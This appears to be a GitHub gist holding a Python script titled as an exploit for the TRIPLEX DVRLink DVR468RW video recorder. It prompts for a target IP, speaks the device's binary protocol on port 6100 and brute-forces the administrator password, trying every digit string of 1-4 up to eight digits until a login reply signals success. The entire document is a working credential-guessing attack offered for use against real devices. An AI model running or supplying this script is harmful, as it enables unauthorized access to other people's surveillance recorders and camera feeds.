TRIPLEX DVRLink DVR468RW Exploit
#!/usr/bin/env python | |
import socket | |
import binascii | |
import sys | |
import time | |
def passList(): | |
n = 1 | |
li = [1] | |
while (int(li[-1]) <= 44444444): | |
k = str_base(int(n)) | |
if (k != 0): | |
li.append(k) | |
n = n + 1 | |
return li | |
def asctohex(string_in): | |
a="" | |
for x in string_in: | |
a = a + ("0"+((hex(ord(x)))[2:]))[-2:] | |
return(a) | |
def getIP(): | |
#Ask for IP | |
while True: | |
TCP_IP = input("Enter IP: ") | |
try: | |
socket.inet_aton(TCP_IP) | |
break | |
except socket.error: | |
print("Error, Try Again") | |
return TCP_IP | |
def connect(to, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((to, port)) | |
return s | |
def makePassPacket(password): | |
packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator | |
packet += '0000eb030000920303000000000058d86701' #18 bytes of something... | |
packet += asctohex(password) #4 password | |
packet += '00' | |
size = len(packet) | |
need = 128-size #64 bits in hex | |
junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else | |
packet += junk[0:need] | |
return packet | |
def str_base(num, base=5, numerals = '01234'): | |
if base < 2 or base > len(numerals): | |
raise ValueError("str_base: base must be between 2 and %i" % len(numerals)) | |
result = '' | |
while num: | |
result = numerals[num % (base)] + result | |
num //= base | |
if result.count('0') > 0: | |
return 0 | |
return result | |
TCP_IP = getIP() | |
TCP_PORT = 6100 | |
print('Generating password list..') | |
passwords = passList() | |
print('Running...') | |
msg1=binascii.unhexlify('01010000') | |
msg2=binascii.unhexlify('01010004') | |
msg4=binascii.unhexlify('01200040') | |
for password in passwords: | |
s1 = connect(TCP_IP,TCP_PORT) | |
#socket 1 data 1 | |
s1.send(msg1) | |
s1.settimeout(5) | |
data1 = s1.recv(4) | |
data2 = s1.recv(4) | |
if (binascii.b2a_hex(data1) != b'02000008'): | |
sys.exit("First packet incorect") | |
s2 = connect(TCP_IP,TCP_PORT) | |
#socket 2 data 1 | |
s2.send(msg2) | |
msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8]) | |
s2.send(msg3) | |
s2.settimeout(5) | |
data3 = s2.recv(4) | |
data4 = s2.recv(8) | |
if (binascii.b2a_hex(data3) != b'02000004'): | |
sys.exit("Second packet incorect") | |
#socket 1 data 2 | |
passPacket = makePassPacket(str(password)) | |
s1.send(msg4) | |
s1.send(binascii.unhexlify(passPacket)) | |
data5 = s1.recv(8) | |
data6 = s1.recv(8) | |
if (binascii.b2a_hex(data6) != b'02160000' ): | |
print('Password:',password) | |
sys.exit() | |
time.sleep(0.1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment